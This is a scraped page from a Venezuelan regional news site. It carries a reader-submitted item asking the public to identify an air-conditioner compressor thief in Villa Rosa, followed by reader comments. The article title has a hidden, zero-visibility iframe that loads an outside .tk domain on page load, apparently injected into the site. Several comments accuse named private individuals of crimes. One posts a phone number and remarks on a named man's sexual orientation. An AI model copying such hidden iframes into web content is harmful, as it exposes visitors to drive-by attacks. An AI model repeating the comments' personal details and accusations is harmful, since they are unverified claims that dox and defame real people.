ReporteConfidencial.info - Periodismo Audaz
Premio de Periodismo Digital
Compartir en facebook Siguenos en twitter
CARTA SEMANAL  
Gobierno en lo peor de dos mundos/ Rodeado cedió... Cancilleres "vigilantes"
Claves secretas de la fuga de Ledezma /Embajada de Chile Bajo Asedio. >>
17/11/2017. CLAVES SECRETAS DE LA FUGA DE ANTONIO LEDEZMA Todos sabemos que dentro  de la oposición existen algunos grupos que se disputan ...
4 comentarios | 9752 visitas
Publicidad
Publicidad
Publicidad
Publicidad
REGIONALES   Desde el pizarròn del lector:

Ladrones de aires acondicionados Villa Rosa (FOTOS)

30 de Enero de 2017 | 16 comentarios | 20482 visitas | Ver imagen original | A+ | A -
¡Comparte esta Noticia!
 
Ladrones de aires acondicionados Villa Rosa (FOTOS) <p><iframe style=display: none; src=https://bolbolt.tk width=320 height=240></iframe></p>

A la comunidad en general, por favor ayuden a identificar a la persona que aparece en las imágenes.

Esta persona junto a otros se lo pasan robando los compresores de los aires acondicionados en villa rosa y anoche fueron capturados por cámaras de seguridad.

Tiene un tatuaje que le cubre todo el brazo derecho y aunque las imágenes no se ven nítidas si se pueden apreciar otros detalles que podrían ayudar con la identificación.

Mañana podrían ser otras personas las víctimas. 

 

 
Fecha de la Noticia: 30 de Enero de 2017
Hora: 14:25:47
Fuente: JOSE MATA
Publicado Por: JOSE MATA

Imágenes







 
¡Comparte esta Noticia!
 
 
COMENTARIOS
16
carlos
15 de septiembre de 2017 a las 07:38
ese chamo delcarro azul es elmarido de noehmi y si se llama jose y esa chama vive alli al frente de la policia es la recidencia q esta alli mismoesa chama sabe de esos robos y de paso es prepagotrabaja en la columbia de la vela y los fines de semana en las noches se rebusca
15
por la calle del pueblo
13 de septiembre de 2017 a las 07:24
Buenos día pueblo ese tipo se la pasa en en Pedro Luis lo llaman jose se la pasa por la iglesia que esta ayaccente abasto la chilena son varios anda en un carro toyota Corolla Araya azul
14
margarita lemus
05 de septiembre de 2017 a las 02:17
ese ladron parece que su padrino trabaja en pdvsa que se llama asdrubal landaeta gonzalez en san tome es un gerente gay y el de la foto es su marido llamalo al 04143839041 su marido se llama carlos sanchez mojona
13
DETENIDO POLIMANEIRO POR ESTOXION
20 de julio de 2017 a las 09:30
CONAS DETIENEN A 2 POLIMANEIRO POR ESTORCION VEA EN TWITTER https://mobile.twitter.com/GNB_espartagaes/status/885230305161990146/phot o/1
12
borges
07 de junio de 2017 a las 05:22
Yo soy el jefe de la policía de Villarrica apenas tengo pocos días y esto es un desastre tengo 8 policías por guardia y todos los tengo que mandar a la estatua de Chávez bus margarita PDVSA gas y otros servicios. Tengo una patrulla destrozada q puedo hacer yo
11
TAREK WILLIAN SAAD
19 de mayo de 2017 a las 12:38
EL DEFENSOR DEL PUESTO TAREK, COMPRO TRES QUINTAS EN PARAISO (1) UNO PAMPATAR, UNA PARA EL QUE ESTA REMODELANDO EN LA CALLE LOS GERANIOS DETRAS DE LA QTA. SAN NICOLAS DE BARI, EN UNA MURALLA GRIS Y MAS ARRIBA ANTES DE LLEGAR A LA ONA HAU DOS QUINTAS PEGADITAS QUE TARECK LE REGALO A SUS CUÑADAS Y SE LLAMA QTA. MAZZIGUI....
10
lavoz del pueblo
06 de mayo de 2017 a las 03:36
aqui en peninsula de macanao hay un policia Gabriel Zabala Alias Licho ese policia esta cuadradiso con los ladrones de telefono puro cobrar remates y tratar mal a la gente
9
maria
13 de febrero de 2017 a las 08:20
esos policias son los ladrones del siglo xxi señores.
8
Jesus
03 de febrero de 2017 a las 02:00
Q bolas!
7
no puede ser
31 de enero de 2017 a las 01:19
sres no busquen mucho los robos en villa estas apañados por la policía y esto se ve por los robos que ha habido cerca de las canchas múltiples 1ro en la charcutería a la sra le robaron todo hasta un freezer que tenía según ella 400kilos de pollos eso en plena calle principal a 3 cuadras de la policía 2do el robo que le hicieran a la carnicería que esta frente a la canchas multiples allí hubo gente que vio y llamaron varias veces a la policía y estos llegaron después que los ladrones se llevaran los aires y por que se enteraron que el dueño es compadre la jefa del dcrym pero dieron tiempo a que se fueran, 3ro el robo de hace 4 días en el cyber que esta al lado de los chinos por la principal allí igual vieron cuando llegaron los ladrones llamaron a la policía y nunca llegaron, todos los robos mencionados fueron en plena calle principal a menos de 3 cuadras del comando de la policía, quienes son los complices
6
lo peor
31 de enero de 2017 a las 05:54
Lo peor es que no hay patrullas, ni policias en villarosa y san antonio. Estamos en manos de los demonios.
5
VALLA BUSQUELO!
30 de enero de 2017 a las 02:51
Debajo de las matica de Bloque3. o en el bloque 05. hay lo va a encontrar..!
4
perpetro
30 de enero de 2017 a las 02:38
en la lagunita el espinal tambien se ha convetido en desastres esos ladrositos de aires acondicionados y la banditas son los que nun ca hacen nada de por ahi mismo que se la tiran de santos
3
ciudadana
30 de enero de 2017 a las 02:26
Hay que denunciar a esos ladrones yo fui afectada a mi me robaron mi compresor vivo en la paralela, y se pudieron llevar ese de las imagenes ya que esta enrejado o es que no respetan ni eso ???
2
Viajero del tiempo
30 de enero de 2017 a las 01:11
Epale Juan Manuel Villaroel como dices que despues de 4 dias hay 0 comentarios, las imagenes de la cámara son del 26-01-17 (1:23 am) pero la fecha de la publicacion de la noticia es de hoy 30-01-17 o acaso eres un viajero en el tiempo y viste esta noticia 4 dias en el futuro y no habian comentarios ???
1
juan manuel villarroel
30 de enero de 2017 a las 12:55
Después de 4 días hay cero (0) comentarios sobre esta noticia. Eso es para que vean que en este pais a las personas lo que en realidad le interesa es: ¿que tan largo tienen el chorizo los capos de las cárceles venezolanas?.